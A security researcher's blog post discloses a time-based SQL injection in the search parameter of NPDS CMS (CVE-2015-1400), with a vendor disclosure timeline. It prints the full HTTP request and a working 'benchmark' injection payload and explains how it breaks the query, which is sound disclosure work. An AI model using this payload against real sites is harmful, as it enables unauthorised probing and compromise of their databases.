Hello folks ! its a long time left i did not write any finding from 2 months , So today i will share one of my finding about NPDS CMS Time Based SQL Injection
What Is NPDS CMS - Beyond content management 'classic', NPDS implements a set of functions specifically dedicated to the management of community and collaborative working groups.
This is a C ontent & C ommunity M anagement S ystem ( CCMS) robust, secure, complete, efficient and really speaking French. Manage your community of users, your collaborative work groups, publish, manage and organize your content with powerful tools available basis.
You can find more about NPDS CMS from this link
So lets come to the finding !
The vulnerability is straight forward and simple as you can know about SQL Injection , While testing this CMS i have found that "search" Post Parameter is vulnerable To Time Based SQL Injection , I think it is vulnerable to other injection as well , but personally i like Time Based SQL Injection so i test it for the same
Here is the HTTP Request Which I Found To Be Vulnerable
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: admin=; pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C7 5fabcf00a72c6c06c40ec432c44c158a90fe85b; Elgg_install=0vsakk8pm4ksu1je3fp48krjv0; Elgg=8ojmn31jmhn2sntglokbokm0t1
Connection: keep-alive
!content-type:! application/x-www-form-urlencoded
Content-Length: 63
query=")and benchmark(20000000,sha1(1))--
======================================================
I performed the Benchmar Test For This Which Was -"and benchmark(20000000,sha1(1))--
The benchmark is best way to test for Time Based SQL Injection -
This forced server to waits for about a second before response, which make me confirm that there is SQL Injection Possibility
We Analyze it briefly
Example
Back End SQL Query
SELECT * FROM some_table WHERE example = [Injection point]
Our Payload
SELECT * FROM some_table WHERE example =")and benchmark(20000000,sha1(1))--
This cause SQL Server to wait for some seconds before sending the response
This was the simple finding as you know =D !
=================================================================================
Reporting Time Line **
Reported To Vendor - 14-12-2014
Verified By Vendor - 15-12-2014
Acknowledge By Vendor - 25-1-2015
Public Disclosure By Vendor - 25-1-2014
Technical Disclosure - 25-1-2015
Vendor Security Advisory - http://www.npds.org/viewtopic.php?topic=26233&forum=12
CVE ID - CVE-2015-1400
Mitigation For This Vulnerability - There Is No Update By Vendor , But That Will Be Out Soon !
So This Was All About - NPDS CMS SQL Injection
Thanks For Reading ! Comments Are Always Welcome :)
No comments:
Post a Comment